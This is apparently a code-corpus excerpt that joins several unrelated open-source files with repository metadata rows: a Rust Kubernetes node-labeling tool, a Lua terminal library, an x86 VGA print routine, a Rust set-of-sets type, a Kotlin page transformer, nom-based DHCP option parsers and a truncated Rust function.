#[clap(global_setting(AppSettings::UseLongFormatForHelpSubcommand))]
struct Cli {
/// Path to the config file
#[clap(parse(from_os_str))]
#[clap(short, long, default_value = "/etc/noderole.yml")]
config: std::path::PathBuf,
/// Kubernetes Node name
#[clap(short, long)]
#[clap(env = "NODE_NAME")]
nodename: String,
}
#[derive(Deserialize)]
struct Config {
/// Assignable node roles as a list of strings
roles: Option<Vec<String>>,
/// KV pairs of additional node labels to assign
labels: Option<BTreeMap<String, String>>,
}
#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
let args = Cli::parse();
let config: Config = Figment::new().merge(Yaml::file(args.config)).extract()?;
let client = Client::try_default().await?;
let nodes: Api<Node> = Api::all(client.clone());
// try reading the given node and hard fail if not available
nodes.get(args.nodename.as_str()).await?;
// map of labels to assign
let mut node_labels: BTreeMap<String, String> = BTreeMap::new();
// roles defined in the config file will be prefixed accordingly
match config.roles {
Some(roles) => {
for role in roles {
node_labels.insert(
format!("node-role.kubernetes.io/{}", role),
"true".to_string(),
);
}
}
None => {}
}
// additional raw KV labels will be appended as-is
match config.labels {
Some(labels) => node_labels.extend(labels),
None => {}
}
let patch = Node {
metadata: ObjectMeta {
name: Some(args.nodename.clone()),
labels: Some(node_labels),
..ObjectMeta::default()
},
spec: None,
status: None,
};
let params = PatchParams::apply(crate_name!());
let patch = Patch::Apply(&patch);
nodes.patch(args.nodename.as_str(), ¶ms, &patch).await?;
Ok(())
}
| 27.595506 | 82 | 0.607492 | 3.0625 |
e735358ce337c7093b31d7291a1e03c36b966f7d | 2,593 | lua | Lua | rom/dotos/libraries/termio.lua | development-of-things-software/.OS | e7d2b4f6f42c5339080dd76d900dba01f96d3742 | [
"MIT"
] | null | null | null | rom/dotos/libraries/termio.lua | development-of-things-software/.OS | e7d2b4f6f42c5339080dd76d900dba01f96d3742 | [
"MIT"
] | null | null | null | rom/dotos/libraries/termio.lua | development-of-things-software/.OS | e7d2b4f6f42c5339080dd76d900dba01f96d3742 | [
"MIT"
] | null | null | null | -- terminal I/O library --
local lib = {}
local function getHandler()
local term = os.getenv("TERM") or "generic"
return require("termio."..term)
end
-------------- Cursor manipulation ---------------
function lib.setCursor(x, y)
if not getHandler().ttyOut() then
return
end
io.write(string.format("\27[%d;%dH", y, x))
end
function lib.getCursor()
if not (getHandler().ttyIn() and getHandler().ttyOut()) then
return 1, 1
end
io.write("\27[6n")
getHandler().setRaw(true)
local resp = ""
repeat
local c = io.read(1)
resp = resp .. c
until c == "R"
getHandler().setRaw(false)
local y, x = resp:match("\27%[(%d+);(%d+)R")
return tonumber(x), tonumber(y)
end
function lib.getTermSize()
local cx, cy = lib.getCursor()
lib.setCursor(9999, 9999)
local w, h = lib.getCursor()
lib.setCursor(cx, cy)
return w, h
end
function lib.cursorVisible(vis)
getHandler().cursorVisible(vis)
end
----------------- Keyboard input -----------------
local patterns = {}
local substitutions = {
A = "up",
B = "down",
C = "right",
D = "left",
["5"] = "pageUp",
["6"] = "pageDown"
}
-- string.unpack isn't a thing in 1.12.2's CC:T 1.89.2, so use this instead
-- because this is all we need
local function strunpack(str)
local result = 0
for c in str:reverse():gmatch(".") do
result = bit32.lshift(result, 8) + c:byte()
end
return result
end
local function getChar(char)
local byte = strunpack(char)
if byte + 96 > 255 then
return utf8.char(byte)
end
return string.char(96 + byte)
end
function lib.readKey()
getHandler().setRaw(true)
local data = io.stdin:read(1)
local key, flags
flags = {}
if data == "\27" then
local intermediate = io.stdin:read(1)
if intermediate == "[" then
data = ""
repeat
local c = io.stdin:read(1)
data = data .. c
if c:match("[a-zA-Z]") then
key = c
end
until c:match("[a-zA-Z]")
flags = {}
for pat, keys in pairs(patterns) do
if data:match(pat) then
flags = keys
end
end
key = substitutions[key] or "unknown"
else
key = io.stdin:read(1)
flags = {alt = true}
end
elseif data:byte() > 31 and data:byte() < 127 then
key = data
elseif data:byte() == (getHandler().keyBackspace or 127) then
key = "backspace"
elseif data:byte() == (getHandler().keyDelete or 8) then
key = "delete"
else
key = getChar(data)
flags = {ctrl = true}
end
getHandler().setRaw(false)
return key, flags
end
return lib
| 19.643939 | 75 | 0.587736 | 3.40625 |
cb8f593bf81163325b16a935ee03841686b1722a | 880 | asm | Assembly | os/bootloader/32bit_print.asm | stplasim/basic-os | 36d951e2e2adcbae75a6066b464552b61a3d7f2c | [
"MIT"
] | 2 | 2021-03-21T09:32:19.000Z | 2022-01-28T22:22:41.000Z | os/bootloader/32bit_print.asm | stplasim/basic-os | 36d951e2e2adcbae75a6066b464552b61a3d7f2c | [
"MIT"
] | null | null | null | os/bootloader/32bit_print.asm | stplasim/basic-os | 36d951e2e2adcbae75a6066b464552b61a3d7f2c | [
"MIT"
] | null | null | null | ; This print string routine works in 32-bit mode
; Here we don't have BIOS interrupts. We directly manipulating the VGA video memory instead of calling int 0x10
; The VGA memory starts at address 0xb8000 and it has a text mode which is useful to avoid manipulating direct pixels.
[bits 32] ; using 32-bit protected mode
; this is how constants are defined
VIDEO_MEMORY equ 0xb8000
WHITE_ON_BLACK equ 0x0f ; the color byte for each character
print_string_pm:
pusha
mov edx, VIDEO_MEMORY
print_string_pm_loop:
mov al, [ebx] ; [ebx] is the address of our character
mov ah, WHITE_ON_BLACK
cmp al, 0 ; check if end of string
je print_string_pm_done
mov [edx], ax ; store character + attribute in video memory
add ebx, 1 ; next char
add edx, 2 ; next video memory position
jmp print_string_pm_loop
print_string_pm_done:
popa
ret | 27.5 | 118 | 0.738636 | 3.1875 |
7cd0d34e13cde89496f6e7690d20e351df94ef5d | 9,317 | rs | Rust | weave/src/matrix/forest/mod.rs | tclchiam/weave-ce | 03c7b01b50111c48f6d1b471a23638825d0dbf0e | [
"BSD-3-Clause"
] | 2 | 2018-09-02T03:43:46.000Z | 2018-09-05T22:48:50.000Z | weave/src/matrix/forest/mod.rs | tclchiam/bowtie | 03c7b01b50111c48f6d1b471a23638825d0dbf0e | [
"BSD-3-Clause"
] | null | null | null | weave/src/matrix/forest/mod.rs | tclchiam/bowtie | 03c7b01b50111c48f6d1b471a23638825d0dbf0e | [
"BSD-3-Clause"
] | null | null | null | use std::hash::Hash;
use std::iter::FromIterator;
use hashbrown::{HashMap, HashSet};
use itertools::Itertools;
mod union;
mod intersect;
mod subset;
mod product;
/// Forest is an immutable set of sets
#[derive(Debug, Clone, Eq, PartialEq)]
pub enum Forest<T: Hash + Eq> {
Empty,
Unit(Vec<T>),
Many(HashSet<Vec<T>>),
}
impl<T: Hash + Eq + Clone + Ord + Sync + Send> Into<Vec<Vec<T>>> for Forest<T> {
fn into(self) -> Vec<Vec<T>> {
match self {
Forest::Empty => Vec::new(),
Forest::Unit(set) => vec![set],
Forest::Many(matrix) => matrix
.into_iter()
.collect(),
}
}
}
impl<'a, T: Hash + Eq + Clone + Ord + Sync + Send> Into<Vec<Vec<T>>> for &'a Forest<T> {
fn into(self) -> Vec<Vec<T>> {
match self {
Forest::Empty => Vec::new(),
Forest::Unit(set) => vec![set.to_vec()],
Forest::Many(matrix) => matrix
.into_iter()
.cloned()
.collect(),
}
}
}
impl<T: Hash + Eq + Clone + Ord + Sync + Send> Forest<T> {
pub fn empty() -> Self {
Forest::Empty
}
pub fn unit(set: &[T]) -> Self {
Forest::Unit(Self::filter_repeats(set))
}
pub fn many(matrix: &[Vec<T>]) -> Self {
match matrix.len() {
0 => Forest::empty(),
1 => Forest::unit(&matrix[0]),
_ => {
let matrix = matrix.iter()
.cloned()
.map(|set| Self::filter_repeats(&set))
.unique()
.collect();
Forest::Many(matrix)
}
}
}
pub fn unique(set: &[T]) -> Self {
let matrix: Vec<Vec<T>> = set.iter()
.cloned()
.map(|element| vec![element])
.collect();
Forest::many(&matrix)
}
fn filter_repeats<B: FromIterator<T>>(set: &[T]) -> B {
set.iter().cloned().sorted().unique().collect::<B>()
}
pub fn len(&self) -> usize {
match self {
Forest::Empty => 0,
Forest::Unit(_) => 1,
Forest::Many(matrix) => matrix.len(),
}
}
pub fn is_empty(&self) -> bool {
match self {
Forest::Empty => true,
_ => false
}
}
pub fn occurrences(&self) -> Vec<(T, usize)> {
match self {
Forest::Empty => vec![],
Forest::Unit(set) => set.iter()
.map(|item| (item.clone(), 1))
.collect(),
Forest::Many(matrix) => {
matrix.iter()
.flatten()
.fold(HashMap::new(), |mut occurrences, item| {
*occurrences.entry(item.clone()).or_insert(0usize) += 1;
occurrences
})
.into_iter()
.sorted_by(|(item1, _), (item2, _)| Ord::cmp(item1, item2))
.collect()
}
}
}
pub fn intersect(self, other: Self) -> Self {
intersect::intersect(self, other)
}
pub fn union(self, other: Self) -> Self {
union::union(self, other)
}
pub fn product(self, other: Self) -> Self {
product::product(self, other)
}
pub fn subset(self, element: T) -> Self {
subset::subset(self, element)
}
pub fn subset_not(self, element: T) -> Self {
subset::subset_not(self, element)
}
pub fn subset_all(self, elements: &[T]) -> Self {
subset::subset_all(self, elements)
}
pub fn subset_none(self, elements: &[T]) -> Self {
subset::subset_none(self, elements)
}
}
#[cfg(test)]
mod eq_forest_tests {
use super::Forest;
#[test]
fn empty_forest() {
let forest1: Forest<&str> = Forest::empty();
let forest2: Forest<&str> = Forest::empty();
assert_eq!(forest1, forest2);
}
#[test]
fn unit_forest() {
let forest1: Forest<&str> = Forest::unit(&["1", "2"]);
let forest2: Forest<&str> = Forest::unit(&["2", "1"]);
assert_eq!(forest1, forest2);
}
#[test]
fn many_forest() {
let forest1: Forest<&str> = Forest::many(&[vec!["1", "2"]]);
let forest2: Forest<&str> = Forest::many(&[vec!["2", "1"]]);
assert_eq!(forest1, forest2);
}
#[test]
fn many_forest_with_none() {
let forest1 = Forest::<&str>::many(&[]);
let forest2 = Forest::<&str>::empty();
assert_eq!(forest1, forest2);
}
#[test]
fn many_forest_with_one() {
let forest1 = Forest::many(&[vec!["1"]]);
let forest2 = Forest::unit(&["1"]);
assert_eq!(forest1, forest2);
}
}
#[cfg(test)]
mod empty_forest_tests {
use super::Forest;
#[test]
fn empty_forest_has_size_0() {
let forest: Forest<&str> = Forest::empty();
assert_eq!(0, forest.len());
}
#[test]
fn empty_forest_is_empty() {
let forest: Forest<&str> = Forest::empty();
assert_eq!(true, forest.is_empty());
}
#[test]
fn empty_forest_into() {
let forest: Forest<&str> = Forest::empty();
assert_eq!(
Vec::<Vec<&str>>::new(),
Into::<Vec<_>>::into(forest.clone())
);
}
}
#[cfg(test)]
mod unit_forest_tests {
use super::Forest;
#[test]
fn unit_forest_has_size_1() {
let forest: Forest<&str> = Forest::unit(&["1", "2"]);
assert_eq!(1, forest.len());
}
#[test]
fn unit_forest_is_empty() {
let forest: Forest<&str> = Forest::unit(&["1", "2"]);
assert_eq!(false, forest.is_empty());
}
#[test]
fn unit_forest_into() {
let forest: Forest<&str> = Forest::unit(&["1", "2"]);
let expected = vec![vec!["1", "2"]];
assert_eq!(
expected,
Into::<Vec<_>>::into(forest.clone())
);
}
}
#[cfg(test)]
mod many_forest_tests {
use super::Forest;
#[test]
fn many_forest_has_size_2() {
let forest: Forest<&str> = Forest::many(&[
vec!["1", "2"],
vec!["2", "3"]
]);
assert_eq!(2, forest.len());
}
#[test]
fn many_forest_is_not_empty() {
let forest: Forest<&str> = Forest::many(&[
vec!["1", "2"],
vec!["2", "3"]
]);
assert_eq!(false, forest.is_empty());
}
#[test]
fn many_forest_into() {
let forest: Forest<&str> = Forest::many(&[
vec!["1", "2"],
vec!["2", "3"]
]);
let expected = vec![
vec!["1", "2"],
vec!["2", "3"],
];
assert_eq!(
expected,
Into::<Vec<_>>::into(forest.clone())
);
}
#[test]
fn unique_forest_into() {
let forest: Forest<&str> = Forest::unique(&["1", "2"]);
let expected = vec![
vec!["2"],
vec!["1"],
];
assert_eq!(
expected,
Into::<Vec<_>>::into(forest.clone())
);
}
}
#[cfg(test)]
mod random_tests {
use super::Forest;
#[test]
fn product_of_two_forests_of_two() {
let forest = Forest::unique(&["1-1", "1-2", "1-3"])
.product(Forest::unique(&["2-1", "2-2", "2-3"]));
assert_eq!(9, forest.len());
let expected = Forest::many(&[
vec!["1-3", "2-1"],
vec!["1-3", "2-2"],
vec!["2-3", "1-2"],
vec!["1-1", "2-2"],
vec!["1-2", "2-2"],
vec!["2-1", "1-2"],
vec!["1-3", "2-3"],
vec!["1-1", "2-1"],
vec!["1-1", "2-3"],
]);
assert_eq!(
expected,
forest
);
}
#[test]
fn product_of_three_forests_of_three() {
let forest = Forest::unique(&["1-1", "1-2", "1-3"])
.product(Forest::unique(&["2-1", "2-2", "2-3"]))
.product(Forest::unique(&["3-1", "3-2", "3-3"]));
assert_eq!(27, forest.len());
let expected = Forest::many(&[
vec!["1-1", "2-1", "3-1"],
vec!["1-1", "2-1", "3-2"],
vec!["1-1", "2-1", "3-3"],
vec!["1-1", "2-2", "3-1"],
vec!["1-1", "2-2", "3-2"],
vec!["1-1", "2-2", "3-3"],
vec!["1-1", "2-3", "3-1"],
vec!["1-1", "2-3", "3-2"],
vec!["1-1", "2-3", "3-3"],
vec!["1-2", "2-1", "3-1"],
vec!["1-2", "2-1", "3-2"],
vec!["1-2", "2-1", "3-3"],
vec!["1-2", "2-2", "3-1"],
vec!["1-2", "2-2", "3-2"],
vec!["1-2", "2-2", "3-3"],
vec!["1-2", "2-3", "3-1"],
vec!["1-2", "2-3", "3-2"],
vec!["1-2", "2-3", "3-3"],
vec!["1-3", "2-1", "3-1"],
vec!["1-3", "2-1", "3-2"],
vec!["1-3", "2-1", "3-3"],
vec!["1-3", "2-2", "3-1"],
vec!["1-3", "2-2", "3-2"],
vec!["1-3", "2-2", "3-3"],
vec!["1-3", "2-3", "3-1"],
vec!["1-3", "2-3", "3-2"],
vec!["1-3", "2-3", "3-3"],
]);
assert_eq!(
expected,
forest
);
}
}
| 24.518421 | 88 | 0.43104 | 3.21875 |
930e02c260b9ab769dfb6fa46dc70d03ed195ef0 | 12,531 | rs | Rust | src/options/parse.rs | Kilobyte22/dhcp_parser | cc95195d6ddd13ff3e9e0816a6dee00f3816d736 | [
"MIT"
] | 2 | 2016-09-05T10:53:09.000Z | 2019-07-19T20:12:13.000Z | src/options/parse.rs | Kilobyte22/dhcp_parser | cc95195d6ddd13ff3e9e0816a6dee00f3816d736 | [
"MIT"
] | 3 | 2016-01-10T20:19:49.000Z | 2019-07-17T06:26:12.000Z | src/options/parse.rs | Kilobyte22/dhcp_parser | cc95195d6ddd13ff3e9e0816a6dee00f3816d736 | [
"MIT"
] | 5 | 2015-10-27T15:11:23.000Z | 2018-10-10T18:35:59.000Z | use options::{DhcpOption};
use options::DhcpOption::*;
use {Result, Error};
use nom::{be_u8, be_u16, be_u32, be_i32, length_value, IResult, sized_buffer};
use std::borrow::{ToOwned};
use std::str;
use std::convert::{From};
use std::net::{IpAddr, Ipv4Addr};
use num::{FromPrimitive};
pub fn parse(bytes: &[u8]) -> Result<Vec<DhcpOption>> {
Ok(vec![])
}
fn u32_to_ip(a: u32) -> IpAddr {
IpAddr::V4(Ipv4Addr::from(a))
}
fn many_ip_addrs(addrs: Vec<u32>) -> Vec<IpAddr> {
addrs.into_iter().map(|a| u32_to_ip(a)).collect()
}
fn ip_addr_pairs(addrs: Vec<u32>) -> Vec<(IpAddr, IpAddr)> {
let (ips, masks): (Vec<_>, Vec<_>) = addrs.into_iter()
.map(|e| u32_to_ip(e))
.enumerate()
.partition(|&(i, _)| i % 2 == 0);
let ips: Vec<_> = ips.into_iter().map(|(_, v)| v).collect();
let masks: Vec<_> = masks.into_iter().map(|(_, v)| v).collect();
ips.into_iter()
.zip(masks.into_iter())
.collect()
}
fn num_u16s(bytes: &[u8]) -> IResult<&[u8], u8> {
match be_u8(bytes) {
IResult::Done(i, o) => IResult::Done(i, o / 2),
a => a,
}
}
fn num_u32s(bytes: &[u8]) -> IResult<&[u8], u8> {
match be_u8(bytes) {
IResult::Done(i, o) => IResult::Done(i, o / 4),
a => a,
}
}
macro_rules! ip_pairs(
($name:ident, $tag:expr, $variant:expr) => (
named!($name<&[u8], DhcpOption>,
chain!(
tag!([$tag]) ~
addrs: length_value!(num_u32s, be_u32),
|| { $variant(ip_addr_pairs(addrs)) }
)
);
)
);
/// A macro for the options that take the form
///
/// [tag, length, ip_addr...]
///
/// Since the only thing that really differs, is
/// the tag and the Enum variant that is returned
macro_rules! many_ips(
($name:ident, $tag:expr, $variant:expr) => (
named!($name<&[u8], DhcpOption>,
chain!(
tag!([$tag]) ~
addrs: length_value!(num_u32s, be_u32),
|| { $variant(many_ip_addrs(addrs)) }
)
);
)
);
/// A macro for options that are of the form:
///
/// [tag, length, somestring]
///
/// , since I haven't figured out a way to
/// easily construct a parser to take the length
/// out of a byte of the input, and parse that
/// many bytes into a string
macro_rules! length_specific_string(
($name:ident, $tag:expr, $variant:expr) => (
named!($name<&[u8], DhcpOption>,
chain!(
tag!([$tag]) ~
s: map_res!(sized_buffer, str::from_utf8),
|| { $variant(s.to_owned()) }
)
);
)
);
macro_rules! single_ip(
($name:ident, $tag:expr, $variant:expr) => (
named!($name<&[u8], DhcpOption>,
chain!(
tag!([$tag]) ~
_length: be_u8 ~
addr: be_u32,
|| { $variant(u32_to_ip(addr)) }
)
);
)
);
macro_rules! bool(
($name:ident, $tag:expr, $variant:expr) => (
named!($name<&[u8], DhcpOption>,
chain!(
tag!([$tag]) ~
_length: be_u8 ~
val: be_u8,
|| { $variant(val == 1u8) }
)
);
)
);
macro_rules! from_primitive(
($name:ident, $tag:expr, $variant:expr) => (
named!($name<&[u8], DhcpOption>,
chain!(
tag!([$tag]) ~
_l: be_u8 ~
data: map_opt!(be_u8, FromPrimitive::from_u8),
|| { $variant(data) }
)
);
)
);
single_ip!(subnet_mask, 1u8, SubnetMask);
named!(time_offset<&[u8], DhcpOption>,
chain!(
tag!([2u8]) ~
// length field, always 4
be_u8 ~
time: be_i32,
|| { TimeOffset(time) }
)
);
many_ips!(router, 3u8, Router);
many_ips!(time_server, 4u8, TimeServer);
many_ips!(name_server, 5u8, NameServer);
many_ips!(domain_name_server, 6u8, DomainNameServer);
many_ips!(log_server, 7u8, LogServer);
many_ips!(cookie_server, 8u8, CookieServer);
many_ips!(lpr_server, 9u8, LprServer);
many_ips!(impress_server, 10u8, ImpressServer);
many_ips!(resource_loc_server, 11u8, ResourceLocationServer);
length_specific_string!(hostname, 12u8, HostName);
named!(boot_file_size<&[u8], DhcpOption>,
chain!(
tag!([13u8]) ~
_length: be_u8 ~
s: be_u16,
|| { BootFileSize(s) }
)
);
length_specific_string!(merit_dump_file, 14u8, MeritDumpFile);
length_specific_string!(domain_name, 15u8, DomainName);
single_ip!(swap_server, 16u8, SwapServer);
length_specific_string!(root_path, 17u8, RootPath);
length_specific_string!(extensions_path, 18u8, ExtensionsPath);
// COLLECT ALL OF THE ABOVE INTO ONE PARSER
named!(vendor_extensions_rfc1497<&[u8], DhcpOption>, alt!(
chain!(tag!([0u8]),
|| { Pad }
)
| chain!(
tag!([255u8]),
|| { End }
)
| subnet_mask
| time_offset
| router
| time_server
| name_server // 5
| domain_name_server
| log_server
| cookie_server
| lpr_server
| impress_server // 10
| resource_loc_server
| hostname
| boot_file_size
| merit_dump_file
| domain_name // 15
| swap_server
| root_path
| extensions_path
)
);
// DHCP options 19-25: IP-layer parameters that apply to the host as a whole.
bool!(ip_forwarding, 19u8, IPForwarding);
bool!(non_source_local_routing, 20u8, NonLocalSourceRouting);
// TODO
/* named!(policy_filter<&[u8], DhcpOption>, */
/*     chain!( */
/*         tag!([21u8]) ~ */
/*         s: map!(sized_buffer, ip_addr_pairs), */
/*         || { PolicyFilter(s) } */
/*     ) */
/* ); */
// Option 22: maximum reassemblable datagram size (u16); length octet ignored.
named!(max_datagram_reassembly_size<&[u8], DhcpOption>,
    chain!(
        tag!([22u8]) ~
        _len: be_u8 ~
        aa: be_u16,
        || { MaxDatagramReassemblySize(aa) }
    )
);
named!(default_ip_ttl<&[u8], DhcpOption>,
    chain!(
        tag!([23u8]) ~
        _length: be_u8 ~
        ttl: be_u8,
        || { DefaultIpTtl(ttl) }
    )
);
named!(path_mtu_aging_timeout<&[u8], DhcpOption>,
    chain!(
        tag!([24u8]) ~
        _length: be_u8 ~
        timeout: be_u32,
        || { PathMtuAgingTimeout(timeout) }
    )
);
// Option 25: a length-prefixed list of u16 MTU plateau values.
named!(path_mtu_plateau_table<&[u8], DhcpOption>,
    chain!(
        tag!([25u8]) ~
        sizes: length_value!(num_u16s, be_u16),
        || { PathMtuPlateauTable(sizes) }
    )
);
// COLLECT
named!(ip_layer_parameters_per_host<&[u8], DhcpOption>, alt!(
    ip_forwarding
    | non_source_local_routing // 20
    /* | policy_filter //TODO */
    | max_datagram_reassembly_size
    | default_ip_ttl
    | path_mtu_aging_timeout
    | path_mtu_plateau_table // 25
    )
);
// DHCP options 26-33: IP-layer parameters configured per interface.
named!(interface_mtu<&[u8], DhcpOption>,
    chain!(
        tag!([26u8]) ~
        _length: be_u8 ~
        mtu: be_u16,
        || { InterfaceMtu(mtu) }
    )
);
bool!(all_subnets_are_local, 27u8, AllSubnetsAreLocal);
single_ip!(broadcast_address, 28u8, BroadcastAddress);
bool!(perform_mask_discovery, 29u8, PerformMaskDiscovery);
bool!(mask_supplier, 30u8, MaskSupplier);
bool!(perform_router_discovery, 31u8, PerformRouterDiscovery);
single_ip!(router_solicitation_address, 32u8, RouterSolicitationAddress);
ip_pairs!(static_route, 33u8, StaticRoute);
// COLLECT
named!(ip_layer_parameters_per_interface<&[u8], DhcpOption>, alt!(
    interface_mtu
    | all_subnets_are_local
    | broadcast_address
    | perform_mask_discovery
    | mask_supplier // 30
    | perform_router_discovery
    | router_solicitation_address
    | static_route
    )
);
// DHCP options 34-36 (link-layer, per interface) and 37-39 (TCP parameters).
bool!(trailer_encapsulation, 34u8, TrailerEncapsulation);
// Option 35: ARP cache timeout in seconds (u32); length octet ignored.
named!(arp_cache_timeout<&[u8], DhcpOption>,
    chain!(
        tag!([35u8]) ~
        _length: be_u8 ~
        timeout: be_u32,
        || { ArpCacheTimeout(timeout) }
    )
);
bool!(ethernet_encapsulation, 36u8, EthernetEncapsulation);
// COLLECT
named!(link_layer_parameters_per_interface<&[u8], DhcpOption>, alt!(
    trailer_encapsulation
    | arp_cache_timeout // 35
    | ethernet_encapsulation
    )
);
named!(tcp_default_ttl<&[u8], DhcpOption>,
    chain!(
        tag!([37u8]) ~
        _length: be_u8 ~
        ttl: be_u8,
        || { TcpDefaultTtl(ttl) }
    )
);
// Option 38: TCP keepalive interval in seconds (u32).
named!(tcp_keepalive_interval<&[u8], DhcpOption>,
    chain!(
        tag!([38u8]) ~
        _length: be_u8 ~
        interval: be_u32,
        || { TcpKeepaliveInterval(interval) }
    )
);
bool!(tcp_keepalive_garbage, 39u8, TcpKeepaliveGarbage);
// COLLECT
named!(tcp_parameters<&[u8], DhcpOption>, alt!(
    tcp_default_ttl
    | tcp_keepalive_interval
    | tcp_keepalive_garbage
    )
);
// DHCP options 40-49: application and service parameters (NIS, NTP,
// vendor-specific data, NetBIOS, X11).
length_specific_string!(nis_domain, 40u8, NisDomain);
many_ips!(network_information_servers, 41u8, NetworkInformationServers);
many_ips!(ntp_servers, 42u8, NtpServers);
// Option 43: opaque vendor-specific bytes, kept uninterpreted.
named!(vendor_extensions<&[u8], DhcpOption>,
    chain!(
        tag!([43u8]) ~
        bytes: length_value!(be_u8, be_u8),
        || { VendorExtensions(bytes) }
    )
);
many_ips!(net_bios_name_servers, 44u8, NetBiosNameServers);
many_ips!(net_bios_datagram_distribution_server, 45u8, NetBiosDatagramDistributionServer);
// Option 46: node-type byte mapped onto an enum via FromPrimitive; `map_opt!`
// makes the parse fail on values outside the enum.
named!(net_bios_node_type<&[u8], DhcpOption>,
    chain!(
        tag!([46u8]) ~
        _length: be_u8 ~
        data: map_opt!(be_u8, FromPrimitive::from_u8),
        || { NetBiosNodeType(data) }
    )
);
length_specific_string!(net_bios_scope, 47u8, NetBiosScope);
many_ips!(xfont_server, 48u8, XFontServer);
many_ips!(xdisplay_manager, 49u8, XDisplayManager);
// COLLECT
named!(application_and_service_parameters<&[u8], DhcpOption>, alt!(
    nis_domain // 40
    | network_information_servers
    | ntp_servers
    | vendor_extensions
    | net_bios_name_servers
    | net_bios_datagram_distribution_server // 45
    | net_bios_node_type
    | net_bios_scope
    | xfont_server
    | xdisplay_manager
    )
);
// DHCP options 50-57: DHCP protocol extensions (lease negotiation).
single_ip!(requested_ip_address, 50u8, RequestedIpAddress);
named!(ip_address_lease_time<&[u8], DhcpOption>,
    chain!(
        tag!([51u8]) ~
        _length: be_u8 ~
        time: be_u32,
        || { IpAddressLeaseTime(time) }
    )
);
from_primitive!(option_overload, 52u8, OptionOverload);
from_primitive!(message_type, 53u8, MessageType);
single_ip!(server_identifier, 54u8, ServerIdentifier);
named!(param_request_list<&[u8], DhcpOption>,
    chain!(
        tag!([55u8]) ~
        data: length_value!(be_u8, be_u8),
        || { ParamRequestList(data) }
    )
);
length_specific_string!(message, 56u8, Message);
// NOTE(review): max_message_size (option 57) is defined here but commented
// out of the `dhcp_extensions` alternation below -- confirm whether that is
// intentional before wiring it in.
named!(max_message_size<&[u8], DhcpOption>,
    chain!(
        tag!([57u8]) ~
        _l: be_u8 ~
        size_: be_u16,
        || { MaxMessageSize(size_) }
    )
);
// COLLECT
named!(dhcp_extensions<&[u8], DhcpOption>, alt!(
    requested_ip_address // 50
    | ip_address_lease_time
    | option_overload
    | message_type
    | server_identifier
    | param_request_list // 55
    | message
    /* | max_message_size */
    /* | renewal_time_value */
    /* | rebinding_time_value */
    /* | class_identifier // 60 */
    /* | client_identifier */
    )
);
// Main parser
// Top-level entry point: tries each option-family parser in turn and yields
// the first DhcpOption that matches the input.
named!(dhcp_option(&'a [u8]) -> DhcpOption, alt!(
    vendor_extensions_rfc1497
    | ip_layer_parameters_per_host
    | ip_layer_parameters_per_interface
    | link_layer_parameters_per_interface
    | tcp_parameters
    | application_and_service_parameters
    | dhcp_extensions
    )
);
#[cfg(test)] mod tests {
    use options::DhcpOption::{Router};
    use super::{router};
    use nom::{IResult};
    use std::net::{IpAddr, Ipv4Addr};
    // Option 3 (Router): tag byte 3, length 8, followed by two IPv4 addresses.
    #[test]
    fn test_many_ip_addresses() {
        let ips = vec![3u8,
                       8,
                       127, 0, 0, 1,
                       192, 168, 1, 1,
        ];
        match router(&ips) {
            IResult::Done(i, o) => {
                // The parser must consume the entire option payload.
                if i.len() > 0 {
                    panic!("Remaining input was {:?}", i);
                }
                assert_eq!(o, Router(vec![IpAddr::V4(Ipv4Addr::new(127, 0, 0, 1)),
                                          IpAddr::V4(Ipv4Addr::new(192, 168, 1, 1))]));
            },
            e => panic!("Result was {:?}", e),
        }
    }
}
| 27.360262 | 90 | 0.562365 | 3.03125 |
8ab928e461865fa511c336723c790fdcfd96989a | 1,361 | kt | Kotlin | app/src/main/java/ru/kartsev/dmitry/cinemadetails/mvvm/view/helper/ZoomOutPageTransformer.kt | Jaguarhl/MoviesDetails | d80929fcb461249c074dfff73ce7156ee91ff074 | [
"Apache-2.0"
] | null | null | null | app/src/main/java/ru/kartsev/dmitry/cinemadetails/mvvm/view/helper/ZoomOutPageTransformer.kt | Jaguarhl/MoviesDetails | d80929fcb461249c074dfff73ce7156ee91ff074 | [
"Apache-2.0"
] | null | null | null | app/src/main/java/ru/kartsev/dmitry/cinemadetails/mvvm/view/helper/ZoomOutPageTransformer.kt | Jaguarhl/MoviesDetails | d80929fcb461249c074dfff73ce7156ee91ff074 | [
"Apache-2.0"
] | null | null | null | package ru.kartsev.dmitry.cinemadetails.mvvm.view.helper
import android.view.View
import androidx.viewpager.widget.ViewPager
import kotlin.math.abs
import kotlin.math.max
private const val MIN_SCALE = 0.85f
private const val MIN_ALPHA = 0.5f
/**
 * "Zoom out" transition between [ViewPager] pages: pages shrink towards
 * [MIN_SCALE] and fade towards [MIN_ALPHA] as they move away from the
 * centered position; fully off-screen pages are made invisible.
 */
class ZoomOutPageTransformer : ViewPager.PageTransformer {

    override fun transformPage(view: View, position: Float) {
        if (position < -1) {
            // Page is far off-screen to the left.
            view.alpha = 0f
        } else if (position <= 1) {
            // Page is at least partially visible: scale and fade with distance
            // from the center, shifting horizontally to keep pages adjacent.
            val scale = max(MIN_SCALE, 1 - abs(position))
            val verticalMargin = view.height * (1 - scale) / 2
            val horizontalMargin = view.width * (1 - scale) / 2
            view.translationX = if (position < 0) {
                horizontalMargin - verticalMargin / 2
            } else {
                horizontalMargin + verticalMargin / 2
            }
            view.scaleX = scale
            view.scaleY = scale
            view.alpha = MIN_ALPHA + ((scale - MIN_SCALE) / (1 - MIN_SCALE)) * (1 - MIN_ALPHA)
        } else {
            // Page is far off-screen to the right.
            view.alpha = 0f
        }
    }
}
f54a78074f5651a294b5fca64ab5fd88bc3b4ad6 | 842 | rs | Rust | rust/src/day01/part01.rs | goksgie/advent-of-code-2021 | e0df17bac95daf221ab97dbcf3f6bfc36aacf04a | [
"MIT"
] | null | null | null | rust/src/day01/part01.rs | goksgie/advent-of-code-2021 | e0df17bac95daf221ab97dbcf3f6bfc36aacf04a | [
"MIT"
] | null | null | null | rust/src/day01/part01.rs | goksgie/advent-of-code-2021 | e0df17bac95daf221ab97dbcf3f6bfc36aacf04a | [
"MIT"
] | null | null | null | /// Compute the consequtive increase in the input and output the result
/// Counts how many elements of `numbers` are strictly greater than the
/// element immediately preceding them.
///
/// Empty and single-element inputs yield 0. (The name's spelling is kept
/// for API compatibility.)
pub fn compute_consequtive_increase<'a, T: IntoIterator<Item = &'a u64>>(numbers: T) -> u64 {
    let mut increases = 0u64;
    let mut iter = numbers.into_iter();
    if let Some(mut previous) = iter.next() {
        for current in iter {
            if current > previous {
                increases += 1;
            }
            previous = current;
        }
    }
